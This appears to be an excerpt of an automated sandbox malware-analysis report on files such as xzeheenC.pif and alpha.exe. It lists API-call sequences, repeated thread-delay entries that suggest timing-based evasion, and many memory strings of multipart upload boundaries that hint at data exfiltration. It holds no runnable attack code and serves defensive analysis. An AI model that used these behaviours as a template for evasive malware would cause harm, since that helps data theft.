              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF7AB1235B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF792DB511C
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599888Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599769Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599644Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599519Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599394Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599269Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599150Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599034Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598909Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598784Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598659Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598534Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598409Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598284Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598159Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598023Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597716Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597596Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596597Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595597Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599890
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599781
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599343
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599234
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599125
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599015
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598906
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598797
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598687
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598578
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598468
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598355
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598250
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598140
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598031
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597922
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597812
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597593
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597265
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597156
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597047
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596937
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596718
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596609
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596500
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596390
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596281
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596172
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596062
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595953
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595843
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595733
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595624
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595515
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595406
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595297
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595187
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595078
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594968
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594859
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594750
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594640
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599891
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599657
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599313
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599188
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599063
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598938
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598719
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598594
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598266
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598157
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598032
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597907
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597344
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596113
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594110
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd213f3d4bedcbh
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd231c021e891b
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20f8ada3c59e<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd208793074bc2h
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20bb0ba85598<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd224ec822fa72<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2070e745a6df<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21d54c9e0a5c<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20f3c83870c3<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd235621b119df<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f7bb30cccae
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f7bb30cccae<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21c3e3b174c0<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1ffbc3b398fe
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21957fa780dd
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd217f06734e57<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2281f045fe39<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fe3262ebcfc
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f091cadca
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd210b4912642d
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20859c831fbc
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20b5944b821b
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2170f0ccb8bf
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20ff88b239de
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20c87699746c
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22b505293680<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22e92e63468f<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd271e66cb8366<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd212ca5861b19<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2164183e6431<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd26038213f839<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20e53751f75b
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002287C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd202f16a5978c
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2177fa1de5ca<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f1d4d0647
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd213f3d4bedcb<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2698048ede00<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd227d39ecb039
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21d6aa07b8e0
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f6572db528e
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f9342a18464<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd27765a939a1a<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd209da301b406
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21f79a600637\Dh
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B623000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f155e2696<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fc0c1b966bb<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f6572db528e<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21254f48c305
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21957fa780dd<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2362215e27d7<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21f79a600637<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fd9705a96a3<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21e620954fe3<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd24a8fb2c45b9<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd225621140a82
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22fa34213483<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21b1a0691632<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f20e7a29d<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd221edce7d449
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22aae7254cb3
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20426636599f
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd211870eb7966
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd220d4b323153<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f91d002431f<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fca735ee8c7
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd202f16a5978c<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd225771662831<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1ffccf134830<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2177fa1de5cah
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2003b93d294e
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20dd81284159<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20a88e7882e3<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21fd08727360
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2015a808a94e
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f9342a18464
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd205b7d4f4ac3<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022809000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f20e7a29d
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f98ce0b208f
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd201d8285f219<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20cec3117c14
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd207e11dc29ac<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f1166fd31
